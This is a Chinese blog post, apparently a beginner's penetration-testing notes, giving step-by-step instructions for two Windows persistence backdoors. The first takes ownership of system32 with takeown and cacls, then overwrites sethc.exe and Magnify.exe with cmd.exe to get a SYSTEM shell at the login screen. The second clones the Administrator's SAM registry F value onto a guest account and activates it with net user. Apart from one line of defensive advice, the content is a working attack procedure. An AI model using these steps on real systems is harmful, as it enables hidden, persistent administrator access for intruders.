内网渗透基础操作---轻松使用后门以及用户克隆

“轻松使用”后门:

既然是后门,也就是说已经拿到管理员权限
环境:win7
原理:把sethc.exe覆盖成cmd.exe。
效果:连续按5次shift键或者win++呼出cmd。
命令
①更改文件所有者

takeown  /F  c:\windows\system32\* /A /R

*:所有文件
/F(file) :指定文件
/A :更改归管理员组所有
/R :递归
在这里插入图片描述
②更改文件权限

cacls c:\windows\system32\*  
/T /E /G administrators:F

因为不知道各个文件的依赖关系,就全部更改权限
/T :类似于递归
/E :编辑ACL不替换
/G :赋予指定用户访问权限:
----R :读取
----W :写入
----C :更改
----F :完全控制在这里插入图片描述
③覆盖
备份cmd

copy cmd.exe cmd.exe.bak

覆盖放大镜

copy cmd.exe Magnify.exe

覆盖粘滞键

copy cmd.exe sethc.exe

注销之后:系统不知道呼出的cmd以何种方式运行,就会默认以system方式运行
防范:所以我们在平常用不到粘滞键的话,最好是把它关闭了。
在这里插入图片描述
本人安全小白,还有很多不懂的地方,如果哪一步做错了,欢迎指点。

“用户克隆”后门:

作用
一般黑客在入侵一个系统就可以采用这个办法来为自己留一个后门。即通过注册表,把管理员简直赋予普通用户,让普通用户拥有管理员权限。

例如guest用户被克隆后当管理员查看guest的时候它还是属于guest组,如果是禁用状态,显示还是禁用状态,但这个时候guest登入到系统而且是管理员权限

命令
win+r->regedit 打开运行对话框,进入注册表
打开HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users目录
在这里插入图片描述
如果SAM文件下的SAM文件无法打开:
在这里插入图片描述
通过下面的高级添加你使用的用户,并且使得该用户具有完全控制的权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
选择需要赋予权限的用户
在这里插入图片描述

确定
在这里插入图片描述

勾选完全控制并确定即可
在这里插入图片描述
紧接着通过Name文件下的Administrator的类型比对,找到管理员的F值进行复制:
在这里插入图片描述

在这里插入图片描述
紧接着找到需要克隆的普通用户:
在这里插入图片描述
将管理员F值粘贴修改:
在这里插入图片描述

C:\WINDOWS\system32>net user zjx /active:yes 激活该用户
在这里插入图片描述
然后注销登录此用户
在这里插入图片描述
win+r打开运行对话框会出现:使用管理权限创建次任务。说明该用户已经继承了管理员权限并且会继承管理员的界面
在这里插入图片描述
后门创建成功。

本人安全小白,还有很多不懂的地方,如果哪一步做错了,欢迎指点。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值